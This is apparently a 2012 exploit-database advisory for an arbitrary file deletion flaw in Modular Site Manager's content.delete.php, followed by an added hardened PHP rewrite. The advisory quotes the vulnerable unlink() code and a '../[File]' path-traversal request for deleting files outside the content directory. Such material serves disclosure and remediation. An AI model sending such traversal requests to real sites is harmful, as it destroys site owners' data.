Modular Site Manager <= Arbitrary Delete Vulnerability

2012-08-11T00:00:00
ID 1337DAY-ID-19153
Type zdt
Reporter GoLd_M
Modified 2012-08-11T00:00:00

Description

Exploit for php platform in category web applications

                                        
# Exploit Title: Modular Site Manager <= Arbitrary Delete Vulnerability
# Date: 11/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://sourceforge.net/projects/phpmsm/
# Category: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [Modular Site Manager]/lk/content.delete.php?id=../[File]
# Code Page /lk/content.delete.php
# <?php
#      unlink('../content/'.$_GET['id']); << --- XXX
#      header("Location: ".$_SERVER['HTTP_REFERER']);
# ?>
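
For the fix side of the code page quoted above: an added example (not code from the advisory or from the Modular Site Manager project) of how content.delete.php could confine the id parameter to files inside ../content/ before calling unlink(). The session keys is_admin and csrf and the index.php redirect target are hypothetical names; the content directory is assumed to sit at ../content relative to the script.

```php
<?php
// Added example: hardened sketch of /lk/content.delete.php, not project code.
// Assumed (hypothetical) names: $_SESSION['is_admin'], $_SESSION['csrf'], index.php.
declare(strict_types=1);
session_start();

/** Return the real path of $id inside $baseDir, or null if it is not allowed. */
function resolve_content_path(string $baseDir, $id): ?string
{
    // Accept only a plain file name: no separators, no "..", no leading dot.
    if (!is_string($id) || !preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]*\z/', $id)) {
        return null;
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $id);
    if ($base === false || $path === false || !is_file($path)) {
        return null;
    }
    // realpath() resolves symlinks and "..", so the result must still sit in $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Deleting is a state change: require POST, a logged-in admin and a CSRF token.
$token = $_SESSION['csrf'] ?? '';
$sent  = $_POST['csrf'] ?? '';
if ($_SERVER['REQUEST_METHOD'] !== 'POST'
    || empty($_SESSION['is_admin'])
    || !is_string($token) || $token === '' || !is_string($sent)
    || !hash_equals($token, $sent)) {
    http_response_code(403);
    exit;
}

$target = resolve_content_path(__DIR__ . '/../content', $_POST['id'] ?? null);
if ($target === null) {
    http_response_code(400);
    exit;
}
unlink($target);
// Redirect to a fixed page instead of echoing the client-supplied Referer header.
header('Location: index.php');
```

The allow-list regex rejects the `../` form shown in the example request before any filesystem call, and the realpath() prefix comparison is a second check in case a symlink inside the content directory points elsewhere.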


